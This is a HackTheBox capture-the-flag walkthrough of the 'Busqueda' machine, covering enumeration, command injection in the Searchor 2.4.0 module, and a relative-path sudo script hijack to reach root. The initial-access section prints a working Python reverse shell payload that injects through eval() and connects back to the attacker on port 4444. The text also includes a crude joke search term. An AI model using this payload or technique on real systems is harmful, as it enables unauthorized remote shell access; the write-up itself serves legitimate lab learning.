HTB - Busqueda

HTB – Busqueda

In this walk through, we will be going through the Busqueda room from HackTheBox. This room is rated as Easy on the platform and it consists of Enumeration, Exploitation and Privilege Escalation of a Linux boot2root machine. So, let’s get started without any delay.


Machine Info:

DescriptionBusqueda is an Easy Difficulty Linux machine that involves exploiting a command injection vulnerability present in a Python module. To get root, we logged into the local gitea service by getting creds in a config file and then abused a python file running as root to get root.


  • I started off with a regular nmap scan with service detection and found two ports opened – 22 (SSH) and 80 (HTTP)

$ sudo nmap -sS -sV

Nmap scan report for
Host is up (0.22s latency).
Not shown: 997 closed ports
22/tcp open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.52
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 28.75 seconds

nmap scan

  • I tried to access the webserver running on port 80 and it was resolving to a hostname – searcher.htb. So added it to my /etc/hosts file and accessed the application.

adding hostname

  • The Searcher application was a web app developed to search with custom queries using different search engines and online networks. I tried to search for some pussies using google with auto-redirect unchecked and it seems like the application is forming a search URL with our searched term for the desired search engine.


Looking for pussies

searching for pussies

  • Fired up gobuster to see if we can find some interesting directories however got no luck with it.

$ gobuster dir -u http://searcher.htb/ -w ~/Desktop/Wordlist/common.txt 
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://searcher.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
2023/12/01 13:24:51 Starting gobuster in directory enumeration mode
/search               (Status: 405) [Size: 153]
/server-status        (Status: 403) [Size: 277]
2023/12/01 13:26:39 Finished

gobuster scan

  • Next, i intercepted the search request using Burpsuite and in the response field, found an interesting header named server which shows the application is developed in python 3.10.6 with Werkzeug (Flask) 2.1.2. Searched for any known exploits for the flask version but found nothing.

Burpsuite POST intercept

Burpsuite Response

  • Next, the footer caught my attention as there is a python module name – Searchor is mentioned along with its version – 2.4.0

Searcher 2.4.0 running

  • Searched for any known exploit for the concerned module and found an exploit POC for that. As per the POC, the vulnerability lies in the eval() function which let us run arbitrary commands on the server and thus leads to command injection. Bingo!

Searcher 2.4.0 exploit

Arbitrary CMD Injection

Initial Access:

  • Next, used the below python reverse shell payload to get initial access on the web server and captured the user flag.

', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);['/bin/sh','-i']);"))#

reverse shell payload

getting the shell


Privilege Escalation:

  • To find potential privilege escalation vectors, uploaded linpeas on the target and executed it.

uploading linpeas

  • The linpeas result shows some interesting directories which has some git config files. Looked into the config file for the flask application running and it reveals a new domain named “gitea.searcher.htb” and the user password.

Linpeas output

git creds

  • Added the new domain to our /etc/hosts file and logged into it using the found credentials. The application had 1 commit done by the administrator which has a SHA1 hash alongside it.

adding hostname

gitea login

hash identifier

  • Moving on, checked the sudo permissions for the user svc using the found password. As per the result, we found out that we can run the script as user root.

sudo -l

sudo -l

  • Checked the working of the script using the whoami command and it throws me an error showcasing the usage. The script takes three commands as arguments – docker ps, docker inspect and full checkup.

executing the script

  • I tried to run script with full-checkup as argument from my home directory and it failed. That means, it is using a relative path for the full-checkup script instead of absolute.

checking the script

full checkup

  • I developed a script to view the contents of the root.txt file with the same name as full-checkup in the /tmp directory and executed it with the help of script. Thus, getting the root flag.

getting root

Machine completed

Also Read: Webgoat – Without password



So that was “Busqueda” for you. We started off with our regular nmap scan and found two ports opened – 22 (SSH) and 80 (HTTP). Next, enumerated the web server on port 80 and found a searcher application running which was using the searcher 2.4.0 python module. Looked for any known exploits related to it and found one. Used it to get the initial access on the target. For privilege escalation, found the git creds in a git config file. With the help of that, logged into the gitea subdomain and found password for user svc. At last, abused the script to get root. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top